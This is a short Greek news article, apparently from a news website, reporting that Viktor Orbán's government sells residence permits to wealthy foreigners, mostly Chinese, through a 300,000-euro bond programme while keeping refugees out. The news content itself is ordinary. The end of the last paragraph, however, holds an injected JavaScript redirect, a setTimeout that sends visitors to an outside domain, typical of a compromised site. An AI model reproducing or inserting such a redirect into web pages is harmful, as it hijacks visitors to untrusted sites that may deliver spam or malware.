Ο Ούγγρος πρωθυπουργός ανοίγει την πόρτα μόνο… στους πλούσιους μετανάστες!

0
5

 

Ο Ούγγρος πρωθυπουργός Βίκτορ Ορμπάν, που είναι γνωστός για τη σκληρή του στάση απέναντι στους πρόσφυγες και έχει ανεγείρει έναν φράχτη προκειμένου να μην τους επιτρέψει την είσοδο, έχει ανοίξει σιωπηλά την πόρτα της Ουγγαρίας στους αλλοδαπούς που είναι αρκετά πλούσιοι ώστε να μπορούν να πληρώσουν για να ζήσουν στη χώρα.

Ένα πρόγραμμα «εγγύησης παραμονής», το οποίο ξεκίνησε το 2013, έχει προσελκύσει χιλιάδες κυρίως πλούσιους Κινέζους που επιθυμούν να χαρούν την καθαρότερη ατμόσφαιρα, να εκμεταλλευτούν τις ευκαιρίες για μόρφωση, αλλά και τον πιο ήρεμο τρόπο ζωής που προσφέρει η Ευρώπη και, αντίθετα με τους πρόσφυγες που φεύγουν από τη Μέση Ανατολή, αυτοί οι μετανάστες αισθάνονται ευπρόσδεκτοι.

«Είναι ένα επιτυχημένο πρόγραμμα διότι φέρνει χρήματα στη χώρα, ενώ ούτε ένα σεντ δεν φεύγει», δήλωσε ο Ορμπάν στο κοινοβούλιο τη Δευτέρα, απαντώντας σε ερώτηση της αντιπολίτευσης.

Όσοι επιθυμούν να εκμεταλλευτούν το πρόγραμμα αυτό και να αποκτήσουν άδεια παραμονής στην Ουγγαρία, θα πρέπει να πληρώσουν το ποσό του ομολόγου, αλλά και 50.000 ευρώ στην υπηρεσία που θα εξετάσει την αίτησή τους. Μετά από πέντε χρόνια όμως μπορούν να πάρουν πίσω τα 300.000 ευρώ του ομολόγου τους και έχουν τη δυνατότητα να παραμείνουν στη χώρα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here